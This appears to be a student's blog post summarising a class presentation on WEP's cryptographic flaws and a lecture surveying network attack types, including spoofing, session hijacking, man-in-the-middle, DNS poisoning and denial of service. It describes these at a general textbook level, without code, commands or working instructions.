Today's presentation by Troy covered the WEP (Wired-Equivalent Privacy) cryptosystem for wireless networks. The system used a flawed encryption method and revealed too much information in the packets it creates. Cracking the cryptosystem requires the use of thousands of snooped packets, but this can be collected in little time, and after the collection period, key cracking takes very litle time.
Today's lecture covered network security.
Networks and particularly internet-based networks are particularly vulnerable to attacks. Networks afford anonymity of attackers, plenty of points of attack, easier access, and potentially more security holes if computers with different security systems or OSes are part of the network. The protocol used in a network can also be a weak point if it has vulnerabilities.
There are many aspects to possible attackson a network. All attacks first need some sort of information gathering. Reconnaissance on the vulnerabilities of a network is generally easy. Port scans gather the ports which a computer is listening to. People involved in the network are generally good sources of information if a little social engineering is used.
Eavesdropping on a network tends to be simple. Wired connections can usually be wiretapped stealthily. Wireless connections are even easier to eavesdrop.
Impersonation attacks involve pretending to be some member of a network. This involves either obtaining a password or exploiting vulnerabilities in rights management systems.
Spoofing attacks involve a weaker form of impersonation, but is applicable to more than just users. For example, a phishing attack involves the attacker spoofing a website to look just like another website, with a convincing address to add to the illusion. Spoofing attacks also cover session hijacks and man-in-the-middle attacks.
Session hijacking is a spoofing attack where an attacker hijacks a TCP connection or HTTP session and inserts malicious data or obtains private information. Man-in-the-middle attacks are similar, but instead of masquerading as an endpoint, the attacker becomes an intermediate node, possibly masquerading as both endpoints at once. It may also allow the attacker to alter packets as they move around the network.
Attackers may also attack the topology of the network by poisoning DNS caches, creating "evil twins", or creating "black holes" which attract packets and drops them.
In some cases, the existence of communication alone can be an important information, and traffic flow analysis tries to detect these covert conversations.
Websites have their own sets of vulnerabilities, mostly involving the interaction with a server trying to generate web pages. Some exploits include modified state information, cross-site scripting, buffer overflows, etc. Some vulnerabilities involve the server asking the client to run a certain piece of code (for example, Java applets), and this can be exploited by attackers to harm the user.
(Distributed) Denial of Service attacks a network's availability. This can be done by disrupting physical connections, flooding connection attempts via SYN flooding, ping floods via smurf attacks, etc. Attackers may use botnets to perform these attacks, since they tend to require huge amounts of resources.
All of these attacks are doable with easy-to-get, convenient programs.
No comments:
Post a Comment